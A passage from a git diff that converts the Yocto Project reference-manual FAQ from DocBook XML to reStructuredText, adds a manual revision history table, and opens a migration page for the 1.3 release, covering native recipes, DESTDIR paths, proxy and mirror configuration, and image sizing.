+"/usr/bin" for ``bindir``, a value of "/usr/lib" for ``libdir``, and so
+forth.
+
+Meanwhile, ``DESTDIR`` is a path within the :term:`Build Directory`.
+However, when the recipe builds a
+native program (i.e. one that is intended to run on the build machine),
+that program is never installed directly to the build machine's root
+file system. Consequently, the build system uses paths within the Build
+Directory for ``DESTDIR``, ``bindir`` and related variables. To better
+understand this, consider the following two paths where the first is
+relatively normal and the second is not:
+
+.. note::
+
+   Due to these lengthy examples, the paths are artificially broken
+   across lines for readability.
+
+::
+
+   /home/maxtothemax/poky-bootchart2/build/tmp/work/i586-poky-linux/zlib/
+      1.2.8-r0/sysroot-destdir/usr/bin
+
+   /home/maxtothemax/poky-bootchart2/build/tmp/work/x86_64-linux/
+      zlib-native/1.2.8-r0/sysroot-destdir/home/maxtothemax/poky-bootchart2/
+      build/tmp/sysroots/x86_64-linux/usr/bin
+
+Even if the paths look unusual,
+they both are correct - the first for a target and the second for a
+native recipe. These paths are a consequence of the ``DESTDIR``
+mechanism and while they appear strange, they are correct and in
+practice very effective.
+
+**Q:** The files provided by my ``*-native`` recipe do not appear to be
+available to other recipes. Files are missing from the native sysroot,
+my recipe is installing to the wrong place, or I am getting permissions
+errors during the do_install task in my recipe! What is wrong?
+
+**A:** This situation results when a build system does not recognize the
+environment variables supplied to it by :term:`BitBake`. The
+incident that prompted this FAQ entry involved a Makefile that used an
+environment variable named ``BINDIR`` instead of the more standard
+variable ``bindir``. The makefile's hardcoded default value of
+"/usr/bin" worked most of the time, but not for the recipe's ``-native``
+variant. For another example, permissions errors might be caused by a
+Makefile that ignores ``DESTDIR`` or uses a different name for that
+environment variable. Check the the build system to see if these kinds
+of issues exist.
+
+**Q:** I'm adding a binary in a recipe but it's different in the image, what is
+changing it?
+
+**A:** The first most obvious change is the system stripping debug symbols from
+it. Setting :term:`INHIBIT_PACKAGE_STRIP` to stop debug symbols being stripped and/or
+:term:`INHIBIT_PACKAGE_DEBUG_SPLIT` to stop debug symbols being split into a separate
+file will ensure the binary is unchanged. The other less obvious thing that can
+happen is prelinking of the image. This is set by default in local.conf via
+:term:`USER_CLASSES` which can contain 'image-prelink'. If you remove that, the
+image will not be prelinked meaning the binaries would be unchanged.
diff --git a/documentation/ref-manual/faq.xml b/documentation/ref-manual/faq.xml
deleted file mode 100644
index d94cb32a86..0000000000
--- a/documentation/ref-manual/faq.xml
+++ /dev/null
@@ -1,835 +0,0 @@
-<!DOCTYPE chapter PUBLIC "-//OASIS//DTD DocBook XML V4.2//EN"
-"http://www.oasis-open.org/docbook/xml/4.2/docbookx.dtd"
-[<!ENTITY % poky SYSTEM "../poky.ent"> %poky; ] >
-
-<chapter id='faq'>
-<title>FAQ</title>
-<qandaset>
-    <qandaentry>
-        <question>
-            <para>
-                How does Poky differ from <ulink url='&OE_HOME_URL;'>OpenEmbedded</ulink>?
-            </para>
-        </question>
-        <answer>
-            <para>
-                The term "<link link='poky'>Poky</link>"
-                refers to the specific reference build system that
-                the Yocto Project provides.
-                Poky is based on <link linkend='oe-core'>OE-Core</link>
-                and <link linkend='bitbake-term'>BitBake</link>.
-                Thus, the generic term used here for the build system is
-                the "OpenEmbedded build system."
-                Development in the Yocto Project using Poky is closely tied to OpenEmbedded, with
-                changes always being merged to OE-Core or BitBake first before being pulled back
-                into Poky.
-                This practice benefits both projects immediately.
-            </para>
-        </answer>
-    </qandaentry>
-
-    <qandaentry>
-        <question>
-            <para id='faq-not-meeting-requirements'>
-                My development system does not meet the
-                required Git, tar, and Python versions.
-                In particular, I do not have Python 3.5.0 or greater.
-                Can I still use the Yocto Project?
-            </para>
-        </question>
-        <answer>
-            <para>
-                You can get the required tools on your host development
-                system a couple different ways (i.e. building a tarball or
-                downloading a tarball).
-                See the
-                "<link linkend='required-git-tar-python-and-gcc-versions'>Required Git, tar, Python and gcc Versions</link>"
-                section for steps on how to update your build tools.
-            </para>
-        </answer>
-    </qandaentry>
-
-    <qandaentry>
-        <question>
-            <para>
-                How can you claim Poky / OpenEmbedded-Core is stable?
-            </para>
-        </question>
-        <answer>
-            <para>
-                There are three areas that help with stability;
-                <itemizedlist>
-                    <listitem><para>The Yocto Project team keeps
-                        <link linkend='oe-core'>OE-Core</link> small
-                        and focused, containing around 830 recipes as opposed to the thousands
-                        available in other OpenEmbedded community layers.
-                        Keeping it small makes it easy to test and maintain.</para></listitem>
-                    <listitem><para>The Yocto Project team runs manual and automated tests
-                        using a small, fixed set of reference hardware as well as emulated
-                        targets.</para></listitem>
-                    <listitem><para>The Yocto Project uses an autobuilder,
-                        which provides continuous build and integration tests.</para></listitem>
-                </itemizedlist>
-            </para>
-        </answer>
-    </qandaentry>
-
-    <qandaentry>
-        <question>
-            <para>
-                How do I get support for my board added to the Yocto Project?
-            </para>
-        </question>
-        <answer>
-            <para>
-                Support for an additional board is added by creating a
-                Board Support Package (BSP) layer for it.
-                For more information on how to create a BSP layer, see the
-                "<ulink url='&YOCTO_DOCS_DEV_URL;#understanding-and-creating-layers'>Understanding and Creating Layers</ulink>"
-                section in the Yocto Project Development Tasks Manual and the
-                <ulink url='&YOCTO_DOCS_BSP_URL;'>Yocto Project Board Support Package (BSP) Developer's Guide</ulink>.
-            </para>
-            <para>
-                Usually, if the board is not completely exotic, adding support in
-                the Yocto Project is fairly straightforward.
-            </para>
-        </answer>
-    </qandaentry>
-
-    <qandaentry>
-        <question>
-            <para>
-                Are there any products built using the OpenEmbedded build system?
-            </para>
-        </question>
-        <answer>
-            <para>
-                The software running on the <ulink url='http://vernier.com/labquest/'>Vernier LabQuest</ulink>
-                is built using the OpenEmbedded build system.
-                See the <ulink url='http://www.vernier.com/products/interfaces/labq/'>Vernier LabQuest</ulink>
-                website for more information.
-                There are a number of pre-production devices using the OpenEmbedded build system
-                and the Yocto Project team
-                announces them as soon as they are released.
-            </para>
-        </answer>
-    </qandaentry>
-
-    <qandaentry>
-        <question>
-            <para>
-                What does the OpenEmbedded build system produce as output?
-            </para>
-        </question>
-        <answer>
-            <para>
-                Because you can use the same set of recipes to create output of
-                various formats, the output of an OpenEmbedded build depends on
-                how you start it.
-                Usually, the output is a flashable image ready for the target
-                device.
-            </para>
-        </answer>
-    </qandaentry>
-
-    <qandaentry>
-        <question>
-            <para>
-                How do I add my package to the Yocto Project?
-            </para>
-        </question>
-        <answer>
-            <para>
-                To add a package, you need to create a BitBake recipe.
-                For information on how to create a BitBake recipe, see the
-                "<ulink url='&YOCTO_DOCS_DEV_URL;#new-recipe-writing-a-new-recipe'>Writing a New Recipe</ulink>"
-                section in the Yocto Project Development Tasks Manual.
-            </para>
-        </answer>
-    </qandaentry>
-
-    <qandaentry>
-        <question>
-            <para>
-                Do I have to reflash my entire board with a new Yocto Project image when recompiling
-                a package?
-            </para>
-        </question>
-        <answer>
-            <para>
-                The OpenEmbedded build system can build packages in various
-                formats such as IPK for OPKG, Debian package
-                (<filename>.deb</filename>), or RPM.
-                You can then upgrade the packages using the package tools on
-                the device, much like on a desktop distribution such as
-                Ubuntu or Fedora.
-                However, package management on the target is entirely optional.
-            </para>
-        </answer>
-    </qandaentry>
-
-    <qandaentry>
-        <question>
-            <para>
-                I see the error '<filename>chmod: XXXXX new permissions are r-xrwxrwx, not r-xr-xr-x</filename>'.
-                What is wrong?
-            </para>
-        </question>
-        <answer>
-            <para>
-                You are probably running the build on an NTFS filesystem.
-                Use <filename>ext2</filename>, <filename>ext3</filename>, or <filename>ext4</filename> instead.
-            </para>
-        </answer>
-    </qandaentry>
-
-<!--    <qandaentry>
-        <question>
-            <para>
-                How do I make the Yocto Project work in RHEL/CentOS?
-            </para>
-        </question>
-        <answer>
-            <para>
-                To get the Yocto Project working under RHEL/CentOS 5.1 you need to first
-                install some required packages.
-                The standard CentOS packages needed are:
-                <itemizedlist>
-                    <listitem><para>"Development tools" (selected during installation)</para></listitem>
-                    <listitem><para><filename>texi2html</filename></para></listitem>
-                    <listitem><para><filename>compat-gcc-34</filename></para></listitem>
-                </itemizedlist>
-                On top of these, you need the following external packages:
-                <itemizedlist>
-                    <listitem><para><filename>python-sqlite2</filename> from
-                        <ulink url='http://dag.wieers.com/rpm/packages/python-sqlite2/'>DAG repository</ulink>
-                        </para></listitem>
-                    <listitem><para><filename>help2man</filename> from
-                        <ulink url='http://centos.karan.org/el4/extras/stable/x86_64/RPMS/repodata/repoview/help2man-0-1.33.1-2.html'>Karan repository</ulink></para></listitem>
-                </itemizedlist>
-            </para>
-
-            <para>
-                Once these packages are installed, the OpenEmbedded build system will be able
-                to build standard images.
-                However, there might be a problem with the QEMU emulator segfaulting.
-                You can either disable the generation of binary locales by setting
-                <filename><link linkend='var-ENABLE_BINARY_LOCALE_GENERATION'>ENABLE_BINARY_LOCALE_GENERATION</link>
-                </filename> to "0" or by removing the <filename>linux-2.6-execshield.patch</filename>
-                from the kernel and rebuilding it since that is the patch that causes the problems with QEMU.
-            </para>
-
-            <note>
-                <para>For information on distributions that the Yocto Project
-                uses during validation, see the
-                <ulink url='&YOCTO_WIKI_URL;/wiki/Distribution_Support'>Distribution Support</ulink>
-                Wiki page.</para>
-                <para>For notes about using the Yocto Project on a RHEL 4-based
-                host, see the
-                <ulink url='&YOCTO_WIKI_URL;/wiki/BuildingOnRHEL4'>Building on RHEL4</ulink>
-                Wiki page.</para>
-            </note>
-        </answer>
-    </qandaentry> -->
-
-    <qandaentry>
-        <question>
-            <para>
-                I see lots of 404 responses for files when the OpenEmbedded
-                build system is trying to download sources.
-                Is something wrong?
-            </para>
-        </question>
-        <answer>
-            <para>
-                Nothing is wrong.
-                The OpenEmbedded build system checks any configured source mirrors before downloading
-                from the upstream sources.
-                The build system does this searching for both source archives and
-                pre-checked out versions of SCM-managed software.
-                These checks help in large installations because it can reduce load on the SCM servers
-                themselves.
-                The address above is one of the default mirrors configured into the
-                build system.
-                Consequently, if an upstream source disappears, the team
-                can place sources there so builds continue to work.
-            </para>
-        </answer>
-    </qandaentry>
-
-    <qandaentry>
-        <question>
-            <para>
-                I have machine-specific data in a package for one machine only but the package is
-                being marked as machine-specific in all cases, how do I prevent this?
-            </para>
-        </question>
-        <answer>
-            <para>
-                Set <filename><link linkend='var-SRC_URI_OVERRIDES_PACKAGE_ARCH'>SRC_URI_OVERRIDES_PACKAGE_ARCH</link>
-                </filename> = "0" in the <filename>.bb</filename> file but make sure the package is
-                manually marked as
-                machine-specific for the case that needs it.
-                The code that handles
-                <filename>SRC_URI_OVERRIDES_PACKAGE_ARCH</filename> is in
-                the <filename>meta/classes/base.bbclass</filename> file.
-            </para>
-        </answer>
-    </qandaentry>
-
-    <qandaentry>
-        <question>
-            <para id='i-am-behind-a-firewall-and-need-to-use-a-proxy-server'>
-                I'm behind a firewall and need to use a proxy server. How do I do that?
-            </para>
-        </question>
-        <answer>
-            <para>
-                Most source fetching by the OpenEmbedded build system is done
-                by <filename>wget</filename> and you therefore need to specify
-                the proxy settings in a <filename>.wgetrc</filename> file,
-                which can be in your home directory if you are a single user
-                or can be in <filename>/usr/local/etc/wgetrc</filename> as
-                a global user file.
-            </para>
-
-            <para>
-                Following is the applicable code for setting various proxy
-                types in the <filename>.wgetrc</filename> file.
-                By default, these settings are disabled with comments.
-                To use them, remove the comments:
-                <literallayout class='monospaced'>
-     # You can set the default proxies for Wget to use for http, https, and ftp.
-     # They will override the value in the environment.
-     #https_proxy = http://proxy.yoyodyne.com:18023/
-     #http_proxy = http://proxy.yoyodyne.com:18023/
-     #ftp_proxy = http://proxy.yoyodyne.com:18023/
-
-     # If you do not want to use proxy at all, set this to off.
-     #use_proxy = on
-                </literallayout>
-                The Yocto Project also includes a
-                <filename>meta-poky/conf/site.conf.sample</filename> file that
-                shows how to configure CVS and Git proxy servers if needed.
-                For more information on setting up various proxy types and
-                configuring proxy servers, see the
-                "<ulink url='&YOCTO_WIKI_URL;/wiki/Working_Behind_a_Network_Proxy'>Working Behind a Network Proxy</ulink>"
-                Wiki page.
-            </para>
-        </answer>
-    </qandaentry>
-
-    <qandaentry>
-        <question>
-            <para>
-                What’s the difference between <replaceable>target</replaceable> and <replaceable>target</replaceable><filename>-native</filename>?
-            </para>
-        </question>
-        <answer>
-            <para>
-                The <filename>*-native</filename> targets are designed to run on the system
-                being used for the build.
-                These are usually tools that are needed to assist the build in some way such as
-                <filename>quilt-native</filename>, which is used to apply patches.
-                The non-native version is the one that runs on the target device.
-            </para>
-        </answer>
-    </qandaentry>
-
-    <qandaentry>
-        <question>
-            <para>
-                I'm seeing random build failures. Help?!
-            </para>
-        </question>
-        <answer>
-            <para>
-                If the same build is failing in totally different and random
-                ways, the most likely explanation is:
-                <itemizedlist>
-                    <listitem><para>The hardware you are running the build on
-                        has some problem.</para></listitem>
-                    <listitem><para>You are running the build under
-                        virtualization, in which case the virtualization
-                        probably has bugs.</para></listitem>
-                </itemizedlist>
-                The OpenEmbedded build system processes a massive amount of
-                data that causes lots of network, disk and CPU activity and
-                is sensitive to even single-bit failures in any of these areas.
-                True random failures have always been traced back to hardware
-                or virtualization issues.
-            </para>
-        </answer>
-    </qandaentry>
-
-    <qandaentry>
-        <question>
-            <para>
-                When I try to build a native recipe, the build fails with <filename>iconv.h</filename> problems.
-            </para>
-        </question>
-        <answer>
-            <para>
-                If you get an error message that indicates GNU
-                <filename>libiconv</filename> is not in use but
-                <filename>iconv.h</filename> has been included from
-                <filename>libiconv</filename>, you need to check to see if
-                you have a previously installed version of the header file
-                in <filename>/usr/local/include</filename>.
-                <literallayout class='monospaced'>
-     #error GNU libiconv not in use but included iconv.h is from libiconv
-                </literallayout>
-                If you find a previously installed file, you should either
-                uninstall it or temporarily rename it and try the build again.
-            </para>
-
-            <para>
-                This issue is just a single manifestation of "system
-                leakage" issues caused when the OpenEmbedded build system
-                finds and uses previously installed files during a native
-                build.
-                This type of issue might not be limited to
-                <filename>iconv.h</filename>.
-                Be sure that leakage cannot occur from
-                <filename>/usr/local/include</filename> and
-                <filename>/opt</filename> locations.
-            </para>
-        </answer>
-    </qandaentry>
-
-    <qandaentry>
-        <question>
-            <para>
-                What do we need to ship for license compliance?
-            </para>
-        </question>
-        <answer>
-            <para>
-                This is a difficult question and you need to consult your lawyer
-                for the answer for your specific case.
-                It is worth bearing in mind that for GPL compliance, there needs
-                to be enough information shipped to allow someone else to
-                rebuild and produce the same end result you are shipping.
-                This means sharing the source code, any patches applied to it,
-                and also any configuration information about how that package
-                was configured and built.
-            </para>
-
-            <para>
-                You can find more information on licensing in the
-                "<ulink url='&YOCTO_DOCS_OM_URL;#licensing'>Licensing</ulink>"
-                section in the Yocto Project Overview and Concepts Manual
-                and also in the
-                "<ulink url='&YOCTO_DOCS_DEV_URL;#maintaining-open-source-license-compliance-during-your-products-lifecycle'>Maintaining Open Source License Compliance During Your Product's Lifecycle</ulink>"
-                section in the Yocto Project Development Tasks Manual.
-            </para>
-        </answer>
-    </qandaentry>
-
-    <qandaentry>
-        <question>
-            <para>
-                How do I disable the cursor on my touchscreen device?
-            </para>
-        </question>
-        <answer>
-            <para>
-                You need to create a form factor file as described in the
-                "<ulink url='&YOCTO_DOCS_BSP_URL;#bsp-filelayout-misc-recipes'>Miscellaneous BSP-Specific Recipe Files</ulink>"
-                section in the Yocto Project Board Support Packages (BSP)
-                Developer's Guide.
-                Set the <filename>HAVE_TOUCHSCREEN</filename> variable equal to
-                one as follows:
-                <literallayout class='monospaced'>
-     HAVE_TOUCHSCREEN=1
-                </literallayout>
-            </para>
-        </answer>
-    </qandaentry>
-
-    <qandaentry>
-        <question>
-            <para>
-                How do I make sure connected network interfaces are brought up by default?
-            </para>
-        </question>
-        <answer>
-            <para>
-                The default interfaces file provided by the netbase recipe does not
-                automatically bring up network interfaces.
-                Therefore, you will need to add a BSP-specific netbase that includes an interfaces
-                file.
-                See the "<ulink url='&YOCTO_DOCS_BSP_URL;#bsp-filelayout-misc-recipes'>Miscellaneous BSP-Specific Recipe Files</ulink>"
-                section in the Yocto Project Board Support Packages (BSP)
-                Developer's Guide for information on creating these types of
-                miscellaneous recipe files.
-            </para>
-            <para>
-                For example, add the following files to your layer:
-                <literallayout class='monospaced'>
-     meta-MACHINE/recipes-bsp/netbase/netbase/MACHINE/interfaces
-     meta-MACHINE/recipes-bsp/netbase/netbase_5.0.bbappend
-                </literallayout>
-            </para>
-        </answer>
-    </qandaentry>
-
-    <qandaentry>
-        <question>
-            <para>
-                How do I create images with more free space?
-            </para>
-        </question>
-        <answer>
-            <para>
-                By default, the OpenEmbedded build system creates images
-                that are 1.3 times the size of the populated root filesystem.
-                To affect the image size, you need to set various
-                configurations:
-                <itemizedlist>
-                    <listitem><para><emphasis>Image Size:</emphasis>
-                        The OpenEmbedded build system uses the
-                        <link linkend='var-IMAGE_ROOTFS_SIZE'><filename>IMAGE_ROOTFS_SIZE</filename></link>
-                        variable to define the size of the image in Kbytes.
-                        The build system determines the size by taking into
-                        account the initial root filesystem size before any
-                        modifications such as requested size for the image and
-                        any requested additional free disk space to be
-                        added to the image.</para></listitem>
-                    <listitem><para><emphasis>Overhead:</emphasis>
-                        Use the
-                        <link linkend='var-IMAGE_OVERHEAD_FACTOR'><filename>IMAGE_OVERHEAD_FACTOR</filename></link>
-                        variable to define the multiplier that the build system
-                        applies to the initial image size, which is 1.3 by
-                        default.</para></listitem>
-                    <listitem><para><emphasis>Additional Free Space:</emphasis>
-                        Use the
-                        <link linkend='var-IMAGE_ROOTFS_EXTRA_SPACE'><filename>IMAGE_ROOTFS_EXTRA_SPACE</filename></link>
-                        variable to add additional free space to the image.
-                        The build system adds this space to the image after
-                        it determines its
-                        <filename>IMAGE_ROOTFS_SIZE</filename>.
-                        </para></listitem>
-                </itemizedlist>
-            </para>
-        </answer>
-    </qandaentry>
-
-    <qandaentry>
-        <question>
-            <para>
-                Why don't you support directories with spaces in the pathnames?
-            </para>
-        </question>
-        <answer>
-            <para>
-                The Yocto Project team has tried to do this before but too
-                many of the tools the OpenEmbedded build system depends on,
-                such as <filename>autoconf</filename>, break when they find
-                spaces in pathnames.
-                Until that situation changes, the team will not support spaces
-                in pathnames.
-            </para>
-        </answer>
-    </qandaentry>
-
-    <qandaentry>
-        <question>
-            <para>
-                How do I use an external toolchain?
-            </para>
-        </question>
-        <answer>
-            <para>
-                The toolchain configuration is very flexible and customizable.
-                It is primarily controlled with the
-                <filename><link linkend='var-TCMODE'>TCMODE</link></filename>
-                variable.
-                This variable controls which <filename>tcmode-*.inc</filename>
-                file to include from the
-                <filename>meta/conf/distro/include</filename> directory within
-                the
-                <link linkend='source-directory'>Source Directory</link>.
-            </para>
-
-            <para>
-                The default value of <filename>TCMODE</filename> is "default",
-                which tells the OpenEmbedded build system to use its internally
-                built toolchain (i.e. <filename>tcmode-default.inc</filename>).
-                However, other patterns are accepted.
-                In particular, "external-*" refers to external toolchains.
-                One example is the Sourcery G++ Toolchain.
-                The support for this toolchain resides in the separate
-                <filename>meta-sourcery</filename> layer at
-                <ulink url='http://github.com/MentorEmbedded/meta-sourcery/'></ulink>.
-            </para>
-
-            <para>
-                In addition to the toolchain configuration, you also need a
-                corresponding toolchain recipe file.
-                This recipe file needs to package up any pre-built objects in
-                the toolchain such as <filename>libgcc</filename>,
-                <filename>libstdcc++</filename>, any locales, and
-                <filename>libc</filename>.
-            </para>
-        </answer>
-    </qandaentry>
-
-    <qandaentry>
-        <question>
-            <para id='how-does-the-yocto-project-obtain-source-code-and-will-it-work-behind-my-firewall-or-proxy-server'>
-                How does the OpenEmbedded build system obtain source code and
-                will it work behind my firewall or proxy server?
-            </para>
-        </question>
-        <answer>
-            <para>
-                The way the build system obtains source code is highly
-                configurable.
-                You can setup the build system to get source code in most
-                environments if HTTP transport is available.
-            </para>
-            <para>
-                When the build system searches for source code, it first
-                tries the local download directory.
-                If that location fails, Poky tries
-                <link linkend='var-PREMIRRORS'><filename>PREMIRRORS</filename></link>,
-                the upstream source, and then
-                <link linkend='var-MIRRORS'><filename>MIRRORS</filename></link>
-                in that order.
-            </para>
-            <para>
-                Assuming your distribution is "poky", the OpenEmbedded build
-                system uses the Yocto Project source
-                <filename>PREMIRRORS</filename> by default for SCM-based
-                sources, upstreams for normal tarballs, and then falls back
-                to a number of other mirrors including the Yocto Project
-                source mirror if those fail.
-            </para>
-            <para>
-                As an example, you could add a specific server for the
-                build system to attempt before any others by adding something
-                like the following to the <filename>local.conf</filename>
-                configuration file:
-                <literallayout class='monospaced'>
-     PREMIRRORS_prepend = "\
-     git://.*/.* http://www.yoctoproject.org/sources/ \n \
-     ftp://.*/.* http://www.yoctoproject.org/sources/ \n \
-     http://.*/.* http://www.yoctoproject.org/sources/ \n \
-     https://.*/.* http://www.yoctoproject.org/sources/ \n"
-                </literallayout>
-            </para>
-            <para>
-                These changes cause the build system to intercept Git, FTP,
-                HTTP, and HTTPS requests and direct them to the
-                <filename>http://</filename> sources mirror.
-                You can use <filename>file://</filename> URLs to point to
-                local directories or network shares as well.
-            </para>
-            <para>
-                Aside from the previous technique, these options also exist:
-                <literallayout class='monospaced'>
-     BB_NO_NETWORK = "1"
-                </literallayout>
-                This statement tells BitBake to issue an error instead of
-                trying to access the Internet.
-                This technique is useful if you want to ensure code builds
-                only from local sources.
-            </para>
-            <para>
-                Here is another technique:
-                <literallayout class='monospaced'>
-     BB_FETCH_PREMIRRORONLY = "1"
-                </literallayout>
-                This statement limits the build system to pulling source
-                from the <filename>PREMIRRORS</filename> only.
-                Again, this technique is useful for reproducing builds.
-            </para>
-            <para>
-                Here is another technique:
-                <literallayout class='monospaced'>
-     BB_GENERATE_MIRROR_TARBALLS = "1"
-                </literallayout>
-                This statement tells the build system to generate mirror
-                tarballs.
-                This technique is useful if you want to create a mirror server.
-                If not, however, the technique can simply waste time during
-                the build.
-            </para>
-            <para>
-                Finally, consider an example where you are behind an
-                HTTP-only firewall.
-                You could make the following changes to the
-                <filename>local.conf</filename> configuration file as long as
-                the <filename>PREMIRRORS</filename> server is current:
-                <literallayout class='monospaced'>
-     PREMIRRORS_prepend = "\
-     ftp://.*/.* http://www.yoctoproject.org/sources/ \n \
-     http://.*/.* http://www.yoctoproject.org/sources/ \n \
-     https://.*/.* http://www.yoctoproject.org/sources/ \n"
-     BB_FETCH_PREMIRRORONLY = "1"
-                </literallayout>
-                These changes would cause the build system to successfully
-                fetch source over HTTP and any network accesses to anything
-                other than the <filename>PREMIRRORS</filename> would fail.
-            </para>
-            <para>
-                The build system also honors the standard shell environment
-                variables <filename>http_proxy</filename>,
-                <filename>ftp_proxy</filename>,
-                <filename>https_proxy</filename>, and
-                <filename>all_proxy</filename> to redirect requests through
-                proxy servers.
-            </para>
-            <note>
-                 You can find more information on the
-                 "<ulink url='&YOCTO_WIKI_URL;/wiki/Working_Behind_a_Network_Proxy'>Working Behind a Network Proxy</ulink>"
-                 Wiki page.
-            </note>
-        </answer>
-    </qandaentry>
-
-    <qandaentry>
-        <question>
-            <para>
-                Can I get rid of build output so I can start over?
-            </para>
-        </question>
-        <answer>
-            <para>
-                Yes - you can easily do this.
-                When you use BitBake to build an image, all the build output
-                goes into the directory created when you run the
-                build environment setup script (i.e.
-                <link linkend='structure-core-script'><filename>&OE_INIT_FILE;</filename></link>).
-                By default, this
-                <link linkend='build-directory'>Build Directory</link>
-                is named <filename>build</filename> but can be named
-                anything you want.
-            </para>
-
-            <para>
-                Within the Build Directory, is the <filename>tmp</filename>
-                directory.
-                To remove all the build output yet preserve any source code or
-                downloaded files from previous builds, simply remove the
-                <filename>tmp</filename> directory.
-            </para>
-        </answer>
-    </qandaentry>
-
-    <qandaentry>
-        <question>
-            <para>
-                Why do <filename>${bindir}</filename> and <filename>${libdir}</filename> have strange values for <filename>-native</filename> recipes?
-            </para>
-        </question>
-        <answer>
-            <para>
-                Executables and libraries might need to be used from a
-                directory other than the directory into which they were
-                initially installed.
-                Complicating this situation is the fact that sometimes these
-                executables and libraries are compiled with the expectation
-                of being run from that initial installation target directory.
-                If this is the case, moving them causes problems.
-            </para>
-
-            <para>
-                This scenario is a fundamental problem for package maintainers
-                of mainstream Linux distributions as well as for the
-                OpenEmbedded build system.
-                As such, a well-established solution exists.
-                Makefiles, Autotools configuration scripts, and other build
-                systems are expected to respect environment variables such as
-                <filename>bindir</filename>, <filename>libdir</filename>,
-                and <filename>sysconfdir</filename> that indicate where
-                executables, libraries, and data reside when a program is
-                actually run.
-                They are also expected to respect a
-                <filename>DESTDIR</filename> environment variable, which is
-                prepended to all the other variables when the build system
-                actually installs the files.
-                It is understood that the program does not actually run from
-                within <filename>DESTDIR</filename>.
-            </para>
-
-            <para>
-                When the OpenEmbedded build system uses a recipe to build a
-                target-architecture program (i.e. one that is intended for
-                inclusion on the image being built), that program eventually
-                runs from the root file system of that image.
-                Thus, the build system provides a value of "/usr/bin" for
-                <filename>bindir</filename>, a value of "/usr/lib" for
-                <filename>libdir</filename>, and so forth.
-            </para>
-
-            <para>
-                Meanwhile, <filename>DESTDIR</filename> is a path within the
-                <link linkend='build-directory'>Build Directory</link>.
-                However, when the recipe builds a native program (i.e. one
-                that is intended to run on the build machine), that program
-                is never installed directly to the build machine's root
-                file system.
-                Consequently, the build system uses paths within the Build
-                Directory for <filename>DESTDIR</filename>,
-                <filename>bindir</filename> and related variables.
-                To better understand this, consider the following two paths
-                where the first is relatively normal and the second is not:
-                <note>
-                    Due to these lengthy examples, the paths are artificially
-                    broken across lines for readability.
-                </note>
-                <literallayout class='monospaced'>
-     /home/maxtothemax/poky-bootchart2/build/tmp/work/i586-poky-linux/zlib/
-        1.2.8-r0/sysroot-destdir/usr/bin
-
-     /home/maxtothemax/poky-bootchart2/build/tmp/work/x86_64-linux/
-        zlib-native/1.2.8-r0/sysroot-destdir/home/maxtothemax/poky-bootchart2/
-        build/tmp/sysroots/x86_64-linux/usr/bin
-                </literallayout>
-                Even if the paths look unusual, they both are correct -
-                the first for a target and the second for a native recipe.
-                These paths are a consequence of the
-                <filename>DESTDIR</filename> mechanism and while they
-                appear strange, they are correct and in practice very effective.
-            </para>
-        </answer>
-    </qandaentry>
-
-    <qandaentry>
-        <question>
-            <para>
-                The files provided by my <filename>*-native</filename> recipe do
-                not appear to be available to other recipes.
-                Files are missing from the native sysroot, my recipe is
-                installing to the wrong place, or I am getting permissions
-                errors during the do_install task in my recipe! What is wrong?
-            </para>
-        </question>
-        <answer>
-            <para>
-                This situation results when a build system does
-                not recognize the environment variables supplied to it by
-                <link linkend='bitbake-term'>BitBake</link>.
-                The incident that prompted this FAQ entry involved a Makefile
-                that used an environment variable named
-                <filename>BINDIR</filename> instead of the more standard
-                variable <filename>bindir</filename>.
-                The makefile's hardcoded default value of "/usr/bin" worked
-                most of the time, but not for the recipe's
-                <filename>-native</filename> variant.
-                For another example, permissions errors might be caused
-                by a Makefile that ignores <filename>DESTDIR</filename> or uses
-                a different name for that environment variable.
-                Check the the build system to see if these kinds of
-                issues exist.
-            </para>
-        </answer>
-    </qandaentry>
-
-</qandaset>
-</chapter>
-<!--
-vim: expandtab tw=80 ts=4
--->
diff --git a/documentation/ref-manual/history.rst b/documentation/ref-manual/history.rst
new file mode 100644
index 0000000000..04d6b096cf
--- /dev/null
+++ b/documentation/ref-manual/history.rst
@@ -0,0 +1,86 @@
+.. SPDX-License-Identifier: CC-BY-SA-2.0-UK
+
+***********************
+Manual Revision History
+***********************
+
+.. list-table::
+   :widths: 10 15 40
+   :header-rows: 1
+
+   * - Revision
+     - Date
+     - Note
+   * - 0.9
+     - November 2010
+     - The initial document released with the Yocto Project 0.9 Release
+   * - 1.0
+     - April 2011
+     - Released with the Yocto Project 1.0 Release.
+   * - 1.1
+     - October 2011
+     - Released with the Yocto Project 1.1 Release.
+   * - 1.2
+     - April 2012
+     - Released with the Yocto Project 1.2 Release.
+   * - 1.3
+     - October 2012
+     - Released with the Yocto Project 1.3 Release.
+   * - 1.4
+     - April 2013
+     - Released with the Yocto Project 1.4 Release.
+   * - 1.5
+     - October 2013
+     - Released with the Yocto Project 1.5 Release.
+   * - 1.6
+     - April 2014
+     - Released with the Yocto Project 1.6 Release.
+   * - 1.7
+     - October 2014
+     - Released with the Yocto Project 1.7 Release.
+   * - 1.8
+     - April 2015
+     - Released with the Yocto Project 1.8 Release.
+   * - 2.0
+     - October 2015
+     - Released with the Yocto Project 2.0 Release.
+   * - 2.1
+     - April 2016
+     - Released with the Yocto Project 2.1 Release.
+   * - 2.2
+     - October 2016
+     - Released with the Yocto Project 2.2 Release.
+   * - 2.3
+     - May 2017
+     - Released with the Yocto Project 2.3 Release.
+   * - 2.4
+     - October 2017
+     - Released with the Yocto Project 2.4 Release.
+   * - 2.5
+     - May 2018
+     - Released with the Yocto Project 2.5 Release.
+   * - 2.6
+     - November 2018
+     - Released with the Yocto Project 2.6 Release.
+   * - 2.7
+     - May 2019
+     - Released with the Yocto Project 2.7 Release.
+   * - 3.0
+     - October 2019
+     - Released with the Yocto Project 3.0 Release.
+   * - 3.1
+     - April 2020
+     - Released with the Yocto Project 3.1 Release.
+
+   * - 3.1.1
+     - June 2020
+     - Released with the Yocto Project 3.1.1 Release.
+   * - 3.1.2
+     - August 2020
+     - Released with the Yocto Project 3.1.2 Release.
+   * - 3.1.3
+     - September 2020
+     - Released with the Yocto Project 3.1.3 Release.
+   * - 3.1.4
+     - November 2020
+     - Released with the Yocto Project 3.1.4 Release.
diff --git a/documentation/ref-manual/migration-1.3.rst b/documentation/ref-manual/migration-1.3.rst
new file mode 100644
index 0000000000..5f975850ba
--- /dev/null
+++ b/documentation/ref-manual/migration-1.3.rst
@@ -0,0 +1,195 @@
+.. SPDX-License-Identifier: CC-BY-SA-2.0-UK
+
+Moving to the Yocto Project 1.3 Release
+=======================================
+
+This section provides migration information for moving to the Yocto
+Project 1.3 Release from the prior release.
+
